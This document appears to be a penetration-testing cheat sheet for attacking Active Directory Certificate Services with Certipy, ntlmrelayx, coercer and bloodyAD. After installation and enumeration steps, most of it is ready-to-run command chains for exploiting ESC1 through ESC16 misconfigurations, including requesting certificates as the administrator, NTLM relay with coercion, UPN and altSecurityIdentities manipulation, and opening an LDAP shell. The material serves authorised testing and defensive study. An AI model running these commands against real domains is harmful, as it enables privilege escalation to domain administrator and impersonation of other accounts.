Installation
https://github.com/ly4k/Certipy/wiki/04-%E2%80%90-Installation
1
2
3
4
| sudo apt update && sudo apt install -y python3 python3-pip
python3 -m venv certipy-venv
source certipy-venv/bin/activate
pip install certipy-ad
|
or
1
| pipx install -f "git+https://github.com/ly4k/Certipy.git"
|
Enumeration
Find PKI Enrollment Services in Active Directory and Certificate Templates Names
1
| nxc ldap ip -u username -p password -M adcs
|
Search for vulnerable certificate templates
1
| certipy find -u username -p password -target dc -dc-ip ip -enabled -vulnerable -stdout
|
Attacks
ESC1
1
| addcomputer.py domain/username:password -computer-name computer_name -computer-pass computer_password
|
1
| certipy req -u computer_name -p computer_password -ca ca -target domain -template template -upn administrator -dc-ip ip
|
Or
1
| certipy req -u username -p password -ca ca -target domain -template template -upn administrator -dc-ip ip
|
Sometimes if you run certipy and see Minimum RSA Key Length : 4096, you need to provide -key-size 4096
1
| certipy req -u username -p password -ca ca -target domain -template template -upn administrator -dc-ip ip -key-size 4096
|
1
| certipy auth -pfx administrator.pfx -domain domain -u username -dc-ip ip
|
New update:
By February 2025, if the StrongCertificateBindingEnforcement registry key is not configured, domain controllers will move to Full Enforcement mode
https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16
Fix: add the sid
1
| certipy req -u username -p password -ca ca -target domain -template template -upn administrator -sid <administrator sid> -dc-ip ip
|
ESC3
1
| certipy req -u username -p password -ca ca -target domain -template template
|
1
| certipy req username -p password -ca ca -target domain -template User -on-behalf-of administrator -pfx pfx_file
|
1
| certipy auth -pfx administrator.pfx -dc-ip ip
|
ESC4
1
| certipy template -u username -p password -template template -save-old -dc-ip ip
|
1
| certipy req -u username -p password -dc-ip ip -ca ca -target dc -template template -upn administrator
|
1
| certipy auth -pfx administrator.pfx -domain domain -u administrator -dc-ip ip
|
ESC7
1
| certipy ca -ca ca -add-officer username -u username@domain -p password -dc-ip ip -dns-tcp -ns ip
|
1
| certipy ca -ca ca -enable-template SubCA -u username@domain -p password -dc-ip ip -dns-tcp -ns ip
|
1
| certipy req -u username@domain -p password -ca ca -target ip -template SubCA -upn username@domain
|
1
| certipy ca -ca ca -issue-request request_ID -u username@domain -p password
|
1
| certipy req -u username@domain -p password -ca ca -target ip -retrieve request_ID
|
1
| certipy auth -pfx pfx_file -domain domain -u username -dc-ip ip
|
ESC8
1
| ntlmrelayx.py -t http://domain/certsrv/certfnsh.asp -smb2support --adcs --template template --no-http-server --no-wcf-server --no-raw-server
|
1
| coercer coerce -u username -p password -l ws_ip -t dc_ip --always-continue
|
1
| certipy- auth -pfx administrator.pfx
|
ESC9
1
| certipy shadow auto -u username@domain -hashes :hash -account target_username
|
1
| certipy account update -u username@domain -hashes :hash -user target_username -upn administrator
|
1
| certipy req -u target_username@domain -hashes :target_hash -ca ca -template template -target $DC_IP
|
1
| certipy account update -u username@domain -hashes :hash -user target_username -upn target_username
|
1
| certipy auth -pfx administrator.pfx -domain domain
|
ESC13
1
| certipy req -u username -p password -ca ca -target domain -template template -dc-ip ip -key-size 4096
|
1
| python3 gettgtpkinit.py -cert-pfx pfx_file domain/username ccache_file -dc-ip ip -v
|
ESC14 - Scenario B
https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9#4a82
1
| bloodyAD --host dc -d domain -u username -p password set object target altSecurityIdentities -v 'X509:<RFC822>target@domain'
|
1
| bloodyAD --host dc -d domain -u owned_user -p password set object target mail -v target@domain
|
1
| certipy account update -u owned_user@domain -p password -user username -upn target
|
1
| certipy req -u username -p password -ca ca -template template -dc-ip ip
|
1
| certipy account update -u owned_user -p password -user username -upn username@domain -dc-ip ip
|
1
| certipy auth -pfx pfx -dc-ip ip -user target -domain domain
|
ESC15
Method 1
1
| certipy req -u username@domain -p password -dc-ip ip -ca ca -template WebServer -application-policies 'Certificate Request Agent'
|
1
| certipy req -u username@domain -p password -dc-ip ip -ca ca -template User -pfx user.pfx -on-behalf-of 'DOMAIN\Administrator'
|
1
| certipy auth -pfx administrator.pfx -dc-ip ip
|
Method 2
1
| certipy req -u username@domain -p password -dc-ip ip -target dc -ca ca -template template -upn administrator@domain -sid <administrator sid> -application-policies 'Client Authentication'
|
1
| certipy auth -pfx administrator.pfx -dc-ip ip -ldap-shell
|
ESC16
We use a user that has GenericAll or GenericWrite
1
| certipy account -u username@domain -p password -dc-ip ip -upn administrator -user owned_user update
|
1
| certipy req -u owned_user@domain -p password -dc-ip ip -target dc -ca ca -template User -upn administrator@domain -sid <administrator sid>
|
1
| certipy account -u username@domain -p password -dc-ip ip -upn owned_user -user owned_user update
|
1
| certipy auth -pfx administrator.pfx -dc-ip ip -domain domain
|
Resources
